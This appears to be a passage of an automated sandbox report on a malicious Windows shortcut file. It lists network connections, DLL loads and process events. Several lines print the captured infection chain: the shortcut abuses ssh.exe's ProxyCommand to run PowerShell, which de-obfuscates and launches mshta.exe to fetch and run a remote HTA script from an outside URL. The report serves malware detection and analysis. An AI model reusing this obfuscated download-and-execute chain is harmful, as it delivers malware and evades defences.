Source: mshta.exe, 00000008.00000003.1404399990.0000014F38D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1406072701.0000014F38D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538729752.0000014F38D7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.liveinternet.ru/click
Source: mshta.exe, 00000008.00000002.2535430577.000001473411D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.000001473411D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.liveinternet.ru/clickHzRXeNB
Source: mshta.exe, 00000008.00000003.1404399990.0000014F38D5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1403798862.0000014F38E48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1406469336.0000014F3C152000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1403798862.0000014F38D59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yastatic.net/partner-code-bundles/1176431/
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownHTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknownHTTPS traffic detected: 109.200.199.111:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.109.170.83:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 213.180.204.90:443 -> 192.168.2.7:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 88.212.201.204:443 -> 192.168.2.7:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 95.163.52.67:443 -> 192.168.2.7:49716 version: TLS 1.2
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal80.winLNK@9/26@6/7
Source: C:\Windows\System32\OpenSSH\ssh.exeFile created: C:\Users\user\.sshJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nevmepv5.klf.ps1Jump to behavior
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: bxAoaISZJQ.lnkReversingLabs: Detection: 34%
Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh.exe "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('msh]]]]]]]ta.]]]]]]]e]]]]]x]]]]]]e h]]]]]]t]]]]]t]]]]]]]ps://]]]]]]g]]]]]]]o]]]]]o]]]]]].]]]]]]s]]]]]]u/]]]]]]J]]]]]3J]]]]]]Hq]]]]]]]I]]]]]]i' -replace ']')" .
Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command ('msh]]]]]]]ta.]]]]]]]e]]]]]x]]]]]]e h]]]]]]t]]]]]t]]]]]]]ps://]]]]]]g]]]]]]]o]]]]]o]]]]]].]]]]]]s]]]]]]u/]]]]]]J]]]]]3J]]]]]]Hq]]]]]]]I]]]]]]i' -replace ']')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://goo.su/J3JHqIi"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://goo.su/J3JHqIi
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command ('msh]]]]]]]ta.]]]]]]]e]]]]]x]]]]]]e h]]]]]]t]]]]]t]]]]]]]ps://]]]]]]g]]]]]]]o]]]]]o]]]]]].]]]]]]s]]]]]]u/]]]]]]J]]]]]3J]]]]]]Hq]]]]]]]I]]]]]]i' -replace ']')Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://goo.su/J3JHqIi"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://goo.su/J3JHqIiJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: libcrypto.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windowscodecsext.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mscms.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coloradapterclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: icm32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: t2embed.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: bxAoaISZJQ.lnkLNK file: ..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Persistence and Installation Behavior

barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
